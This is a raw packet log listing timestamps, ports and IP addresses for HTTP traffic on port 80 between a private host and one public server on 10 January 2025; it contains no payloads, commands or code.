Jan 10, 2025 19:12:29.540571928 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540611982 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540636063 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540647030 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540657997 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540669918 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540714025 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540714025 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540744066 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540756941 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540767908 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540781021 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540800095 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540812016 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540816069 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540816069 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540823936 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540838003 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540847063 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540865898 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540883064 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540883064 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540942907 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540946960 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540957928 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540968895 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540981054 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.540991068 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.540992022 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541004896 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541022062 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541022062 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541033983 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541048050 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541060925 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541060925 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541079998 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541095018 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541116953 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541127920 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541138887 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541162014 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541188955 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541224003 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541235924 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541246891 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541260004 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541270971 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541285038 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541286945 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541297913 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541311979 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541326046 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541342974 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541354895 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541366100 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541388035 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541388035 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541395903 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541409969 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541420937 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541440964 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541440964 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541465998 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541536093 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541548967 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541558981 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541573048 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541582108 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541585922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541595936 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541610003 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541618109 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541618109 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541623116 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541670084 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541685104 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541686058 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541698933 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541709900 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541745901 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541745901 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541769981 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541781902 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541793108 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541805029 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541815996 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541853905 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541853905 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541853905 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541933060 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541944981 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541956902 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541968107 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541980028 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541990995 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.541995049 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.541995049 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.542002916 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542022943 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.542045116 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542047024 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.542057037 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542068005 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542078972 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542087078 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.542098999 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.542125940 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.542126894 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542139053 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542144060 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542170048 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.542211056 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.542264938 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542275906 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542282104 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542288065 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542299032 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542304993 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542318106 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542327881 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.542347908 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.542375088 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.542375088 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628256083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628272057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628298998 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628317118 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628329039 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628340960 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628349066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628349066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628382921 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628385067 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628385067 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628392935 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628415108 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628463984 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628509045 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628518105 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628550053 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628550053 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628575087 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628604889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628617048 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628633022 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628650904 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628655910 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628655910 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628660917 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628680944 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628694057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628712893 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628712893 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628712893 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628757000 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628757000 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628762007 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628789902 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628806114 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628825903 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628843069 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628845930 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628846884 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628854036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628865957 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628876925 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628878117 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628878117 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628894091 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628928900 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628928900 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.628933907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628945112 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628954887 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.628983974 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629012108 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629039049 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629049063 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629092932 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629405975 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629416943 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629429102 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629452944 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629460096 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629463911 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629475117 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629482031 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629482031 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629487991 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629512072 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629600048 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629626036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629637003 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629654884 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629663944 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629674911 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629677057 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629677057 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629688025 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629698038 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629714966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629714966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629717112 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629728079 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629741907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629754066 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629759073 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629759073 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629765987 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629812002 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629812002 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629822969 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629834890 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629846096 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629857063 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629868031 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629884958 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629884958 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629925966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.629940033 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629949093 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629961014 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629971981 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.629980087 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630059958 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630072117 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630083084 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630094051 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630105019 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630111933 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630111933 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630115986 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630129099 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630148888 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630148888 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630179882 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630191088 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630192995 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630203009 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630213022 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630223989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630237103 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630249023 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630249977 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630306005 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630309105 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630317926 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630328894 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630341053 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630353928 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630379915 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630379915 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630400896 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630429983 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630512953 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630597115 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630608082 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630618095 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630624056 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630630970 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630641937 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630641937 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630659103 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630671978 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630683899 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630692959 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630692959 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630733967 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630733967 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630748034 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630759954 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630779982 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630788088 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630794048 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630811930 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630892992 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630904913 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630916119 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630928040 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630938053 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630939007 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630939007 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630949974 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630961895 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630974054 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.630979061 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.630979061 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631027937 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631027937 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631053925 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631066084 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631077051 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631125927 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631171942 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631248951 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631261110 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631270885 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631283998 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631294966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631331921 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631344080 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631470919 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631483078 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631527901 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631527901 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631557941 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631570101 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631582022 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631593943 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631607056 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631618977 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631622076 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631642103 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631642103 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631663084 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631778002 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631791115 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631802082 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631814957 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631820917 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631822109 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631833076 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631844997 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631854057 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631854057 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631855011 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631867886 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631877899 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.631896973 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631896973 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.631917000 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.726600885 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.726618052 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.726632118 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.726659060 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.726671934 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.726681948 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.726710081 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.726726055 CET	80	49726	104.21.75.48	192.168.2.11
